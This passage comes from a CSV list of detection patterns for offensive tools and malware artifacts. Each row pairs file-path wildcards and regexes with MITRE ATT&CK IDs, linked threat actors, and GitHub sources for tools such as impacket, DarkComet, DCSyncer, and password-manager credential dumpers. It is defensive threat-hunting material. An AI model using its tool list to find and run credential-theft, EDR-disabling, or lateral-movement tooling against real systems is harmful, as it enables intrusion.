SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","14765" "*\daclread.py*",".{0,1000}\\daclread\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","14766" "*\dafthack\MSOLSpray*",".{0,1000}\\dafthack\\MSOLSpray.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","14767" "*\dagonlocker.html*",".{0,1000}\\dagonlocker\.html.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14768" 
"*\Dandelion_RAT.exe*",".{0,1000}\\Dandelion_RAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14785" "*\dangerousACL_Computer.txt*",".{0,1000}\\dangerousACL_Computer\.txt.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","0","N/A","N/A","5","4","389","106","2025-04-08T06:17:54Z","2018-04-20T11:29:06Z","14786" "*\dangerousACL_Groups.txt*",".{0,1000}\\dangerousACL_Groups\.txt.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","0","N/A","N/A","5","4","389","106","2025-04-08T06:17:54Z","2018-04-20T11:29:06Z","14787" "*\Dark Comet Stub Crypter.exe*",".{0,1000}\\Dark\sComet\sStub\sCrypter\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14788" "*\darkangels.txt*",".{0,1000}\\darkangels\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes 
archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14789" "*\DarkCoderSc.exe*",".{0,1000}\\DarkCoderSc\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14790" "*\DarkComet.exe*",".{0,1000}\\DarkComet\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","Transparent Tribe - SilverTerrier - APT38 ","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14791" "*\DarkComet.exe*",".{0,1000}\\DarkComet\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","Transparent Tribe - SilverTerrier - APT38 ","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14792" "*\DarkComet_Full_setup.exe*",".{0,1000}\\DarkComet_Full_setup\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - 
TA0003 - TA0002 - TA0005 - TA0007","N/A","Transparent Tribe - SilverTerrier - APT38 ","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14793" "*\DarkComet_Module_setup.exe*",".{0,1000}\\DarkComet_Module_setup\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","Transparent Tribe - SilverTerrier - APT38 ","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14794" "*\darkexe.py*",".{0,1000}\\darkexe\.py.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","N/A","10","8","758","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z","14795" "*\darkfire.bat*",".{0,1000}\\darkfire\.bat.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","14796" "*\DarkLoadLibrary.*",".{0,1000}\\DarkLoadLibrary\..{0,1000}","offensive_tool_keyword","DarkLoadLibrary","LoadLibrary for offensive operations","T1071.001 - T1055.002 - T1055.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/DarkLoadLibrary","1","0","N/A","N/A","10","10","1133","207","2021-10-22T07:27:58Z","2021-06-17T08:33:47Z","14797" "*\Darkside.exe*",".{0,1000}\\Darkside\.exe.{0,1000}","offensive_tool_keyword","Darkside","C# AV/EDR Killer using less-known driver 
(BYOVD)","T1547.006 - T1055 - T1562.001","TA0005 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/ph4nt0mbyt3/Darkside","1","0","N/A","N/A","10","2","175","34","2023-11-10T16:01:21Z","2023-11-10T15:34:20Z","14798" "*\Darkside.sln*",".{0,1000}\\Darkside\.sln.{0,1000}","offensive_tool_keyword","Darkside","C# AV/EDR Killer using less-known driver (BYOVD)","T1547.006 - T1055 - T1562.001","TA0005 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/ph4nt0mbyt3/Darkside","1","0","N/A","N/A","10","2","175","34","2023-11-10T16:01:21Z","2023-11-10T15:34:20Z","14799" "*\Dark-Virus.exe*",".{0,1000}\\Dark\-Virus\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14800" "*\Dark-Virus.exe*",".{0,1000}\\Dark\-Virus\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14801" "*\DarkWidow\src\*",".{0,1000}\\DarkWidow\\src\\.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - 
T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","0","N/A","N/A","10","7","671","91","2025-03-12T21:58:25Z","2023-07-24T13:59:16Z","14802" "*\dashlane\getCredsdashlaneEntries.h*",".{0,1000}\\dashlane\\getCredsdashlaneEntries\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","14804" "*\dashlane\getCredsdashlaneMaster.h*",".{0,1000}\\dashlane\\getCredsdashlaneMaster\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","14805" "*\Data breach warning.txt*",".{0,1000}\\Data\sbreach\swarning\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14806" "*\Data\WinAuditDB.mdb*",".{0,1000}\\Data\\WinAuditDB\.mdb.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","14807" 
"*\dazzleUP_Reflective_DLL.x64.dll*",".{0,1000}\\dazzleUP_Reflective_DLL\.x64\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","14810" "*\dbgview64-infected.exe*",".{0,1000}\\dbgview64\-infected\.exe.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","14811" "*\dbms\fingerprint.py*",".{0,1000}\\dbms\\fingerprint\.py.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","N/A","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","14812" "*\dcomexec.exe*",".{0,1000}\\dcomexec\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","14814" "*\dcomexec.py*",".{0,1000}\\dcomexec\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","14815" "*\dcomhijack.py*",".{0,1000}\\dcomhijack\.py.{0,1000}","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM with impacket and DLL Hijacking","T1570 - T1021.003 - T1574.001 - T1574.002","TA0008 - TA0003 - TA0005","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","0","N/A","N/A","7","3","290","24","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z","14816" "*\DCOMUploadExec.exe*",".{0,1000}\\DCOMUploadExec\.exe.{0,1000}","offensive_tool_keyword","DCOMUploadExec","DCOM Lateral movement POC abusing the IMsiServer interface - uploads and executes a payload remotely","T1021.003 - T1570 - T1105 - T1569.002","TA0008 - TA0011 - TA0002","N/A","N/A","Lateral Movement","https://github.com/deepinstinct/DCOMUploadExec","1","0","N/A","N/A","9","4","357","52","2024-12-13T14:03:12Z","2024-11-13T16:05:29Z","14817" "*\DCOMUploadExec.sln*",".{0,1000}\\DCOMUploadExec\.sln.{0,1000}","offensive_tool_keyword","DCOMUploadExec","DCOM Lateral movement POC abusing the IMsiServer interface - uploads and executes a payload remotely","T1021.003 - T1570 - T1105 - T1569.002","TA0008 - TA0011 - TA0002","N/A","N/A","Lateral 
Movement","https://github.com/deepinstinct/DCOMUploadExec","1","0","N/A","N/A","9","4","357","52","2024-12-13T14:03:12Z","2024-11-13T16:05:29Z","14818" "*\DCOMUploadExec-main*",".{0,1000}\\DCOMUploadExec\-main.{0,1000}","offensive_tool_keyword","DCOMUploadExec","DCOM Lateral movement POC abusing the IMsiServer interface - uploads and executes a payload remotely","T1021.003 - T1570 - T1105 - T1569.002","TA0008 - TA0011 - TA0002","N/A","N/A","Lateral Movement","https://github.com/deepinstinct/DCOMUploadExec","1","0","N/A","N/A","9","4","357","52","2024-12-13T14:03:12Z","2024-11-13T16:05:29Z","14819" "*\dControl.exe*",".{0,1000}\\dControl\.exe.{0,1000}","offensive_tool_keyword","defender-control","disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://www.sordum.org/9480/defender-control-v2-1/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","14820" "*\dControl.rar*",".{0,1000}\\dControl\.rar.{0,1000}","offensive_tool_keyword","defender-control","disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://www.sordum.org/9480/defender-control-v2-1/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","14821" "*\DcRat.sln*",".{0,1000}\\DcRat\.sln.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","N/A","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","14822" "*\dcrypt.exe*",".{0,1000}\\dcrypt\.exe.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","N/A","10","5","499","108","2024-07-03T10:05:01Z","2019-04-20T14:51:18Z","14823" 
"*\dcrypt.sys*",".{0,1000}\\dcrypt\.sys.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","N/A","10","5","499","108","2024-07-03T10:05:01Z","2019-04-20T14:51:18Z","14824" "*\DCrypt\Bin*",".{0,1000}\\DCrypt\\Bin.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","N/A","10","5","499","108","2024-07-03T10:05:01Z","2019-04-20T14:51:18Z","14825" "*\dcrypt_setup.exe*",".{0,1000}\\dcrypt_setup\.exe.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","N/A","10","5","499","108","2024-07-03T10:05:01Z","2019-04-20T14:51:18Z","14826" "*\dcs_weak_kerberos_ciphersuite.txt*",".{0,1000}\\dcs_weak_kerberos_ciphersuite\.txt.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","0","N/A","N/A","5","4","389","106","2025-04-08T06:17:54Z","2018-04-20T11:29:06Z","14827" "*\dcshadow.html*",".{0,1000}\\dcshadow\.html.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","14828" "*\DCSyncer.sln*",".{0,1000}\\DCSyncer\.sln.{0,1000}","offensive_tool_keyword","DCSyncer","Perform DCSync operation","T1003.006","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/notsoshant/DCSyncer","1","0","N/A","N/A","10","2","143","22","2024-11-05T20:03:27Z","2020-06-06T17:20:22Z","14829" "*\DCSyncer-master*",".{0,1000}\\DCSyncer\-master.{0,1000}","offensive_tool_keyword","DCSyncer","Perform DCSync operation","T1003.006","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/notsoshant/DCSyncer","1","0","N/A","N/A","10","2","143","22","2024-11-05T20:03:27Z","2020-06-06T17:20:22Z","14830" "*\ddspoof.py*",".{0,1000}\\ddspoof\.py.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","N/A","9","2","122","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z","14832" "*\DDSpoof\networking\*",".{0,1000}\\DDSpoof\\networking\\.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","N/A","9","2","122","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z","14833" 
"*\DDSpoof\sniffers\*",".{0,1000}\\DDSpoof\\sniffers\\.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","N/A","9","2","122","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z","14834" "*\deadPool.ps1*",".{0,1000}\\deadPool\.ps1.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","0","N/A","N/A","9","1","15","0","2025-03-12T07:34:04Z","2025-03-12T06:58:51Z","14835" "*\DeadPotato\pipe\epmapper*",".{0,1000}\\DeadPotato\\pipe\\epmapper.{0,1000}","offensive_tool_keyword","DeadPotato","DeadPotato is a windows privilege escalation utility from the Potato family of exploits leveraging the SeImpersonate right to obtain SYSTEM privileges","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","N/A","N/A","Privilege Escalation","https://github.com/lypd0/DeadPotato","1","0","#namedpipe","N/A","10","4","382","45","2024-08-17T06:08:29Z","2024-07-31T01:08:30Z","14836" "*\Deamond RAT 1.2\*",".{0,1000}\\Deamond\sRAT\s1\.2\\.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14837" "*\Debug\Injected.dll*",".{0,1000}\\Debug\\Injected\.dll.{0,1000}","offensive_tool_keyword","ShimMe","Injects a DLL into a suspended process running as SYSTEM via the 
OfficeClickToRun service for privilege escalation - Shim Injector: Injects a DLL into a process by modifying shim data in memory without creating or registering new SDB files to evade detection.","T1055 - T1053 - T1548.002 - T1078 - T1546 - T1070","TA0004 - TA0005 - TA0006 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/ShimMe","1","0","N/A","N/A","9","2","140","20","2024-10-29T07:33:38Z","2024-08-04T10:03:28Z","14838" "*\Debug\SharpDump.pdb*",".{0,1000}\\Debug\\SharpDump\.pdb.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#content","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","14839" "*\Debug\SharpRoast.pdb*",".{0,1000}\\Debug\\SharpRoast\.pdb.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#content","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","14840" "*\Debug\SharpWMI.pdb*",".{0,1000}\\Debug\\SharpWMI\.pdb.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - 
TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#content","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","14841" "*\DecryptAutoLogon.exe*",".{0,1000}\\DecryptAutoLogon\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","14842" "*\DecryptAutoLogon.exe*",".{0,1000}\\DecryptAutoLogon\.exe.{0,1000}","offensive_tool_keyword","DecryptAutoLogon","Command line tool to extract/decrypt the password that was stored in the LSA by SysInternals AutoLogon","T1003.001 - T1555.003 - T1003.006","TA0006","N/A","N/A","Credential Access","https://github.com/securesean/DecryptAutoLogon","1","0","N/A","N/A","10","3","218","32","2020-12-05T16:14:28Z","2020-12-03T20:38:59Z","14843" "*\DecryptAutoLogon.exe*",".{0,1000}\\DecryptAutoLogon\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation 
